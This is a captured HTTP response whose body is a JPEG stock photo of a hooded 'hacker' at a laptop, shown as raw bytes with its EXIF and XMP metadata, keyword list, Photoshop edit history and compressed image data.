          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5huJF4cliNws1kNbVWT700RS%2B9LaiJ%2BMV5CuLOj75IUvrFH9Hr56jt0hnpGur5D3UUbJTgQDAjB937Lrl8lcOCFvqMCBhlaE44ehvtb3AQ3Dmsn2xi0BBywZD9W8yHQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47eb8004c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (64833 bytes)
          ÿØÿàJFIF``ÿá
          ÓExifII*íIÚŽàntƒ‹(1“2ži‡¦›œ‚²žœV4ŸœŠhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.CanonCanon EOS 700DÀÆ-'ÀÆ-'PhotoScape2018:06:03 23:07:25hacker in a jacket with a hood with a laptop sits at the table. data; danger; internet; code; concept; privacy; virus; network; security; computer; web; identity; attack; dark; crime; man; table; theft; cyber; hacker; online; anonymous; information; software; type; secure; laptop; professional; hack; password; hacking; safety; enter; criminal; prevention; notebook; phishing; using; worm; work; programmer; trojan; hood; illegal; system; antivirus program; person; fraud; background; deskhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.š‚ ‚("ˆ'ˆd0ˆ2ˆd02300D’
          X’`’
          h’p’	’
          ’x†’ð€ ÿÿ í I¢p
          ¢x
          ¢¤¤¤¤1¤
          €
          2¤
          4¤­
          5¤À
          È2013:12:29 00:53:532013:12:29 00:53:53Тt@Bϒi@B$ASCIISSUCv3H4sIAAAAAAAEAIVSy27DIBC8V+o/WJxtyQTsOPmHSr1HPWCztVGIsXikiiL/e8GPhERRKy7M7O4wu8v1/S1JUM2MaNA+uQbksZDSGauZFar3dJ4uPHBhlRZMBjJw4xRBxjLrDJhIohatsao5Dp2yyvNk1TCdsxb0FAx8JNMwC63XfxRavB1mnKyBKegrfAihNOKMqydupcb0j8pPUIOEV/Uf0N8l5svX2gNroW8uweQY2dcggc1TOMyp6PjjWz1N7SxJZ8FBRZg5LlTU7lk1TJqnwQxaNKJvozJlO9ARbvy+1CkiemUnJ8tsEPezDRATvN1U4RQU07IoK7Tu0C9E8NjrvNZO+JC+RB7dIBXjwO/Ui4XjYlORguwqchvu8+7nFJqTfM4Yb3/E1SfhMx9feF1Nt3n6jwlalGR5IRqqCOqoJDndMMqzbyghoxXfZazgZYZzUu8A57zGhf8H4y+wSCPvKQMAAA==O~¼4U373075006498(EF17-40mm f/4L USM0000000000ÿá:Îhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
          <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.1.1-Exiv2">
           <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
            <rdf:Description rdf:about=""
              xmlns:crs="http://ns.adobe.com/camera-raw-settings/1.0/"
              xmlns:xap="http://ns.adobe.com/xap/1.0/"
              xmlns:aux="http://ns.adobe.com/exif/1.0/aux/"
              xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
              xmlns:xapMM="http://ns.adobe.com/xap/1.0/mm/"
              xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
              xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
              xmlns:dc="http://purl.org/dc/elements/1.1/"
              xmlns:MicrosoftPhoto_1_="http://ns.microsoft.com/photo/1.0/"
             crs:RawFileName="IMG_5199.CR2"
             crs:Version="9.8"
             crs:ProcessVersion="6.7"
             crs:WhiteBalance="As Shot"
             crs:AutoWhiteVersion="134348800"
             crs:Temperature="6200"
             crs:Tint="+13"
             crs:Saturation="0"
             crs:Sharpness="25"
             crs:LuminanceSmoothing="0"
             crs:ColorNoiseReduction="25"
             crs:VignetteAmount="0"
             crs:ShadowTint="0"
             crs:RedHue="0"
             crs:RedSaturation="0"
             crs:GreenHue="0"
             crs:GreenSaturation="0"
             crs:BlueHue="0"
             crs:BlueSaturation="0"
             crs:Vibrance="0"
             crs:HueAdjustmentRed="0"
             crs:HueAdjustmentOrange="0"
             crs:HueAdjustmentYellow="0"
             crs:HueAdjustmentGreen="0"
             crs:HueAdjustmentAqua="0"
             crs:HueAdjustmentBlue="0"
             crs:HueAdjustmentPurple="0"
             crs:HueAdjustmentMagenta="0"
             crs:SaturationAdjustmentRed="0"
             crs:SaturationAdjustmentOrange="0"
             crs:SaturationAdjustmentYellow="0"
             crs:SaturationAdjustmentGreen="0"
             crs:SaturationAdjustmentAqua="0"
             crs:SaturationAdjustmentBlue="0"
             crs:SaturationAdjustmentPurple="0"
             crs:SaturationAdjustmentMagenta="0"
             crs:LuminanceAdjustmentRed="0"
             crs:LuminanceAdjustmentOrange="0"
             crs:LuminanceAdjustmentYellow="0"
             crs:LuminanceAdjustmentGreen="0"
             crs:LuminanceAdjustmentAqua="0"
             crs:LuminanceAdjustmentBlue="0"
             crs:LuminanceAdjustmentPurple="0"
             crs:LuminanceAdjustmentMagenta="0"
             crs:SplitToningShadowHue="0"
             crs:SplitToningShadowSaturation="0"
             crs:SplitToningHighlightHue="0"
             crs:SplitToningHighlightSaturation="0"
             crs:SplitToningBalance="0"
             crs:ParametricShadows="0"
             crs:ParametricDarks="0"
             crs:ParametricLights="0"
             crs:ParametricHighlights="0"
             crs:ParametricShadowSplit="25"
             crs:ParametricMidtoneSplit="50"
             crs:ParametricHighlightSplit="75"
             crs:SharpenRadius="+1.0"
             crs:SharpenDetail="25"
             crs:SharpenEdgeMasking="0"
             crs:PostCropVignetteAmount="0"
             crs:GrainAmount="0"
             crs:ColorNoiseReductionDetail="50"
             crs:ColorNoiseReductionSmoothness="50"
             crs:LensProfileEnable="0"
             crs:LensManualDistortionAmount="0"
             crs:PerspectiveVertical="0"
             crs:PerspectiveHorizontal="0"
             crs:PerspectiveRotate="0.0"
             crs:PerspectiveScale="100"
             crs:PerspectiveAspect="0"
             crs:PerspectiveUpright="0"
             crs:PerspectiveX="0.00"
             crs:PerspectiveY="0.00"
             crs:AutoLateralCA="0"
             crs:Exposure2012="+0.65"
             crs:Contrast2012="+14"
             crs:Highlights2012="+12"
             crs:Shadows2012="-15"
             crs:Whites2012="0"
             crs:Blacks2012="0"
             crs:Clarity2012="0"
             crs:DefringePurpleAmount="0"
             crs:DefringePurpleHueLo="30"
             crs:DefringePurpleHueHi="70"
             crs:DefringeGreenAmount="0"
             crs:DefringeGreenHueLo="40"
             crs:DefringeGreenHueHi="60"
             crs:Dehaze="0"
             crs:ToneMapStrength="0"
             crs:ConvertToGrayscale="False"
             crs:ToneCurveName="Medium Contrast"
             crs:ToneCurveName2012="Linear"
             crs:CameraProfile="Adobe Standard"
             crs:CameraProfileDigest="BA45C872F6A5D11497D00CBA08D5783F"
             crs:LensProfileSetup="LensDefaults"
             crs:UprightVersion="151388160"
             crs:UprightCenterMode="0"
             crs:UprightCenterNormX="0.5"
             crs:UprightCenterNormY="0.5"
             crs:UprightFocalMode="0"
             crs:UprightFocalLength35mm="35"
             crs:UprightPreview="False"
             crs:UprightTransformCount="6"
             crs:UprightFourSegmentsCount="0"
             crs:HasSettings="True"
             crs:HasCrop="False"
             crs:AlreadyApplied="True"
             xap:Rating="0"
             xap:ModifyDate="2018-06-03T23:07:25+03:00"
             xap:CreateDate="2013-12-29T00:53:53"
             xap:MetadataDate="2018-06-03T23:15:58+03:00"
             xap:CreatorTool="Adobe Photoshop CC 2017 (Windows)"
             aux:SerialNumber="373075006498"
             aux:LensInfo="17/1 40/1 0/0 0/0"
             aux:Lens="EF17-40mm f/4L USM"
             aux:LensID="231"
             aux:LensSerialNumber="0000000000"
             aux:ImageNumber="0"
             aux:ApproximateFocusDistance="372/100"
             aux:FlashCompensation="0/1"
             aux:Firmware="1.1.4"
             photoshop:DateCreated="2013-12-29T00:53:53"
             photoshop:LegacyIPTCDigest="FE4259D653B76A6D98332B527F221691"
             photoshop:ColorMode="3"
             photoshop:ICCProfile="Adobe RGB (1998)"
             xapMM:DocumentID="adobe:docid:photoshop:c3703942-52c7-11e8-bd54-e910d37672ae"
             xapMM:OriginalDocumentID="B5831E1C2251FE2C015A9161D841CB07"
             xapMM:InstanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
             dc:format="image/jpeg">
             <crs:ToneCurve>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>32, 22</rdf:li>
               <rdf:li>64, 56</rdf:li>
               <rdf:li>128, 128</rdf:li>
               <rdf:li>192, 196</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurve>
             <crs:ToneCurveRed>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveRed>
             <crs:ToneCurveGreen>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveGreen>
             <crs:ToneCurveBlue>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveBlue>
             <crs:ToneCurvePV2012>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012>
             <crs:ToneCurvePV2012Red>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Red>
             <crs:ToneCurvePV2012Green>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Green>
             <crs:ToneCurvePV2012Blue>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Blue>
             <photoshop:DocumentAncestors>
              <rdf:Bag>
               <rdf:li>xmp.did:575e95f8-8b0b-5f4b-8f74-e357ec31cb33</rdf:li>
              </rdf:Bag>
             </photoshop:DocumentAncestors>
             <photoshop:Headline>
              <rdf:Alt>
               <rdf:li>hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </photoshop:Headline>
             <xapMM:History>
              <rdf:Seq>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/x-canon-cr2 to image/tiff"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:23b5655a-6741-a247-913b-5219ad3a5ef3"
                stEvt:when="2018-05-07T23:41:32+03:00"
                stEvt:softwareAgent="Adobe Photoshop Camera Raw 9.8 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:a0ae3901-555f-994a-9dcd-059a864d1904"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:575e95f8-8b0b-5f4b-8f74-e357ec31cb33"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:0dcc8af0-dbc1-014c-b748-bda8a6854bd0"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:9e76d847-c3b6-7148-b311-431630914674"
                stEvt:when="2018-06-03T23:05:45+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:e78942ac-bb59-1c4e-8f8f-66032e78d7ae"
                stEvt:when="2018-06-03T23:07:25+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
                stEvt:when="2018-06-03T23:15:58+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
              </rdf:Seq>
             </xapMM:History>
             <xapMM:DerivedFrom
              stRef:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
              stRef:documentID="adobe:docid:photoshop:185649bf-5237-11e8-9e13-a05ef46db9cb"
              stRef:originalDocumentID="B5831E1C2251FE2C015A9161D841CB07"/>
             <dc:description>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.</rdf:li>
              </rdf:Alt>
             </dc:description>
             <dc:title>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </dc:title>
             <dc:subject>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </dc:subject>
             <MicrosoftPhoto_1_:LastKeywordXMP>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </MicrosoftPhoto_1_:LastKeywordXMP>
            </rdf:Description>
           </rdf:RDF>
          </x:xmpmeta>
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                     
          <?xpacket end="w"?>ÿí®Photoshop 3.08BIM‘Z%G@hacker in a jacket with a hood with a laptop sits at the table. 720131229<005353+0000xhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.i@hacker in a jacket with a hood with a laptop sits at the table. datadangerinternetcodeconceptprivacyvirusnetworksecuritycomputerwebidentityattackdarkcrimemantabletheftcyberhackeronline	anonymousinformationsoftwaretypesecurelaptopprofessionalhackpasswordhackingsafetyentercriminal
          preventionnotebookphishingusingwormwork
          programmertrojanhoodillegalsystemantivirus programpersonfraud
          backgrounddeskÿâ@ICC_PROFILE0ADBEmntrRGB XYZ ÏacspAPPLnoneöÖÓ-ADBE
          cprtü2desc0kwtptœbkpt°rTRCÄgTRCÔbTRCärXYZôgXYZbXYZtextCopyright 1999 Adobe Systems IncorporateddescAdobe RGB (1998)XYZ óQÌXYZ curv3curv3curv3XYZ œO¥üXYZ 4 ,•XYZ &1/¾œÿÛC
          
          
          
          
          
          #%$""!&+7/&)4)!"0A149;>>>%.DIC<H7=>;ÿÛC
          
          ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ÿÀÚ"ÿÄ	
          ÿĵ}!1AQa"q2‘¡#B±ÁRÑð$3br‚	
          %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ	
          ÿĵw!1AQaq"2B‘¡±Á	#3RðbrÑ
          $4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚâãäåæçèéêòóôõö÷øùúÿÚ?ñÜðlSA޾µe„~_½A´T's¢pqê4;zё½±Ö´qïHBŠdY†F6öÇZ7m펴»F3FьÐ;1	c ìh$:Ô )£
          N;ÐbÛғwÌO­;`ôëKåûQt²c8Å.àHcÁ¥íI… ,Ðõ©ä¡»Ò‘TpqÅZ‘bòAqRÚLޝ7(·ržá÷»ã¥Ü2[¹)vg»Å=­!¥†K§·¥.FK.I=½)ÁrEJ/jMšF›{²„%†NOJ*tÉÉÏáVÌ
          {SM¨©çF¯QlT%BSœœô¦U©!@ÆséBD¹Œç¦*ù•Œ]	9X…J•
          Ç9éO,®Fì®=;T­8ëӚT‰]ÀöÏZ—%¹¬hÎü£p¬UÉÁ§­9vå+Ûj³&qힴô¶ŒÈ§^k'4vÇ
          Q¾„m:¢£ª:c­Wk€Ç~NvãïZ×Ö¶þ@Ø9œÖO’7Œ×'Sq’¹XÊU©MBèedÉ,WÇ~•0»ŒãïŒb¡HÆ0prqͶxÆ98çÒ­¨³–­‹ÑÏîe<·lt©7*–eä“Óҩڀ§|r{֊"²‚ZçšQg±†”êÆïr0ʤ‘ÎOåJ¬©ÓžrxíRˆ•— q@HȝÑ֩̉YSŒóÅ*•Q·998©jFqFÄÛ»c4]
          S’!l
          qÉ5ÍÄaœg‡Ï¥:b
          ^ëÎ*“Æ.Ý1ž¼ãéZÂ)êÏ?ZQN1 wQTä/|u&¦™ö¤>ªÄãò©­¡‰eVar3ÏO­hêñY,Jb€3ìkITJIX奄œ¨Î£’[~ðÆ0‘"%–ÜÀàŒ`u¡dŽ#•%²àôÆ=¡Uê½ñÁÎ¥
          ®8ÎNyô«¼N^J‹¶Ÿ€Ä’8†Õ%ƒ7<cýzXåHv¨%'qǨÅ8 ·;Žyô Â»”mÎî˜9¢ñcQ«­¡<7q"'pç'´Ï¶F•œ©,ò*?%wÆKr<Ə!K’FAŒ}j9boíkÚÊÝ¿àÓ#/qÛ·±ß9¦yˆWÊÉÛ·±ß9©¾Ëócolç<c×4†Ü*W’OúÕ^&.g«^]~â#"2y[° 6;ÿ]'š¿hFä*àtì*_%w#FI'øÑä©f\`¯\;ć
          ŽßÖÅxœG"±äÍK¤lª¤¸Ý’qŽ1Šp…I#ÚprqÍX°Šp<Á€xç҉IY²¨P¨ç¦·þ¿"7*¸ŒeÎN:db˜"ˆÉ;pAlzÿú«vþ1ƒÉÆ9õ¬ViÈgž¿JÊæG~+
          èÊ×¹(Š#ݑ´‚ØïœÓ|ÄÙåg¸ÝŽùÍ=bW€àôç“VÅZ-ãÓ=kG(­Î(Ñ«SáKoÀ¥æ/ÉژÅ26:±è5ml÷sŽ1ž¼â¬Ç`w0÷¡ÔŠ`ëÍéêgۆósŽ•>_-Ó~•¨¶ñƹÅ8Æ g›­}ŽÚysŠ\Ïm¯¸ÌKlš”ڏ-”u$Ñ1¨ê)j;wÅOµfŸPŠV3ž7IžJ㪭^ቭ‰ VÀõ8â¢6qð1œôÅ\j®§5lÛ÷L芰
          Č6zS¤qç;2+RÖÎ(Þ2
          :úÎÜÉû±G¶5eµ}5ÖægºàP¤p{Ž?:Ðk4è:ã5Úílc¶kUR,àž¬
          À€Œ;œb€FÆÉ©þÎrFޔôµÉ Œc®j¹ÑšÃÔob¨#Ë#¾sI‘³óš¶m9>ÔÃnyã§Ч<=EЮHòÀïš	Tw©„YþøæGŸá§ÌŒÝ9•QéJ
          ü¹þ֞œQ°œSº„ˆÁá³ÔÓЍÁ»ÒƒÅMn‰»/ғjÅÓ§'$Šìx#¾hÜ>÷|t©î7ezTE@¡4Ч44‘ÉîGJjœԅ@íAP;S¹.÷GziÆÓʁڍ¢‹ƒ‹#¢¤Ú?:6Œzw'‘È廑җpÉaÔö¥Ú3FÑH«1¤ŽqހF{S¶ŒÑ´f‹ŠÌD?1÷¥Âúþ•$!2wT„Eš–õ66ã{‚9éM_—ƒÜÐ~í2­#+1ã€ëHxP;Óh ›è<õ-݈۬⛊zj
          Zˆ«¸ïR„Ͻ}©Ø¨lè„ÜP wæ”;â›KRl¬£Sv
          u N)€Œ­Ø
          q‹€Ý±IА”T¶ÍcÛažXÉnØ¥ò×,݈£¸¢ìj1ì!ˆÍØôüé¢3yŒ{óRKŠWe{8¾‚#ÉÝݸ¥Më÷¸ËRíqNÅ&Í#C±Æu$þS¡„…
          Üšàj6WŠ.ÞÂä„äɚ c	Àm¦¢Ž-©±ˆ
          ´÷÷éPù¥›“Lp
          R‹ØÎu¡~d¼‰¤o“ËSómõ÷éBHßqNXï×Ú«;ŽjÕ²ÆÇsM¤‘9ʤմ4Xù°…ê@ªwpï\&	gž¼T×R ­g4ÎÀ¯Zʜ^èô1µ —$Ö£äýîBH~yëÀæ‰?}÷áÎyúsUñšP2zf·å<‡V÷ºÜЎ>D‘NXçóÎjòŒ”aÀSÏ·5VÔ~èT¤íúW$îݏ¡Ã¨ÂÖܰ¤ƒžzS7.Qò¯^zVl÷˜8Z¬Ó»÷'éU-™UÌád¯ýÀ5
          ҆GmQóô¨¾ÖIY8Øžzt¬¼æŠÙQHó¥™Te×}ÎÒäl1àsßÅ4ñ$“dld㞽8¨¡T'çâ­2Û ¡Ùh樜›K¯ÌŒ|“K#UÈÛÏ^A©ço-Ý²¬Ão9Ï9ª-00*K¡¼cŠ9uBf¡+/éßüÇLj]šFg9ëÏZH¿q!³ñϱçõªØÇlQŒqŒ¾S^Ö²Ûõ,Åû•T€ÌÇôã¢1åÅå1
          í»ôã]#y"#3Š5}t‡HVI¤D%±°õ¡ÄQ­k+Z	mhÄMÃoÃ8ÿ
          ½ªGŒãvÓüúQ¸…8Áã äT7+ rk’NR•‘ïэ4”実kË_/ËݎŸJG…3vÿUS´‘åË7J·Pââ÷:©Ô…X_—M¾D[FÈbn{õÅAqk¾-‘°fR3Ï^1S\ۙGª¥¬¤á‰Åk¥îyøˆÞNÏ~Â<fãrFA*üó׀3úTŸgyäù?†BOéÏéVc·XÇNjdQ¸Ru-±tð|Îóë¹Í«É$l­€­Ï=9ëQ-¦é#~RsíÎjìã‘Qb³ŒÝŽÚ¸z~Ѷ¿­¢4‰(áTsíDQ2:6~@˜?—J“bŸ3%R‚wK̆Q²a(ÆÝ˜ý1ŠœsºOáeâ˜Ñ‚rE.1Û=P¢œdûn=¸gá#z8Wg<©<{óQãڌR±n^C€ØInAa~zÒ(Ø~b9aÿë¦ãړìO5ºQ³† dñþ4Õ@Và’)¸¤Å;Ín„‘»TðN
          $l?xƒLAóŠYGÍK¨_÷cqòìþ-¿×¥4¨+³¾ßëIŠLUœíù
          TØ1#‚£’1øÒb“ÈoÈVQÉ*Gø&)1TŒäïÐCôÇ
          HʬÁ‡@y Šn)™;>‚”²·@:Ó|¥Ê·`)ؤÅUًŒ{
          Û»b”F7níŠ(^´îÉQöñ|Å»LhÈ,ݍLÝi§¥RlÊpÙ	R¥‰èOõ¤i$ô&•²Ji`GJ³•Ù0_—¯­òà2i”UX˚Ãǩ́·¹™IEƒ˜“¶Þø£øv÷ÅGE0óÓo|PyG\
          eX9‰G<¢¼
          ‰:ÐiXÑIØxåFy暼€O'œPI*9¦ä“œÐœ‡W=ðqKü9ïŠfNsžiFIÎy¦$ÉP|¹=qRp=ñPïÇ~i‡®y¨³fê¤b‰Ë€	ïÆiLG^3U÷ç'4›ˆ9Ï4ùIuÙhɎsÍ;?ÝõªˆèM9$e<Nƾº–ÏÇ­@éšb±ÇZp$µŽµ$8uP:“²ŽØ¨A#ŒÔ„€T³X=uÇm´îäÚ`'íK“ŒgŠ
          MîÀôŒ–
          Ð~”Ì’1ž)rHÁ<Tš¦‰e˜7@E7Ìïÿxc4d‘‚j„y9'’»Ô©ÍÆ7Š'i1»ŸŸŒý*8ÉuÜÇ,	۟\Tn$ÏÌIÇJiw$Ç#¥t(ö<™Vw÷®M%‰ËÛIúT¶Ñ™U\ä°VÁÿ?Uìàî$ކ´­÷IÝëQ=хJ¤õÛþwف‡wñí8=ñš­ h`Nýƒ'¾3Ww6wdæ£1n—ÌÜsëXÆVÜôªÑRK‘kýkêErÏö}ù!ö.Oùü*¼„¬[Á!ÎÝÄuéWoÃ$jÊH8ëYbGX1ÜzŸZ֞±¹Ã~ί+íý2y‰DfCµ‹
          Øú,ÄÆ	åc'͏\?<Õu‘Ô’¬A=O­*ÈèIV žµ|§#¬ÿ«nh­É…•S£HAǯRÜ]Ѭ'†r8ïÍf¬Ž™Úäg¯4‹# !X€zâ£Ù+ÜéþЗ+ô½“kíé¸â¤VdµÜ„†2`‘ôâ¡§$v1\õÅlևŸÚM޹\HÇ=20Š¡ašN´P––&R¼Ü¬]S¾IVSò¬Š=¹Çò¢2Ò³‰‰ J¼Üôª­#¸˜:JÒÈàrØé“QÈuýa]wßÒå»bÒ1ó~b$ùsëƒÇò©X—HÙþfvç×nPódw]ÎNÕ©Vk™¢E,ÏÛª}㢝uìŸ[~:õô	/;Îì'“Óüj՞ŸsuÊÊS€•Áã§>ýëFÖÊÎÝ“3Ot>ëcåSì?­]ó£fiãrF£;ÎosßéZª}Î9bm¤­µü
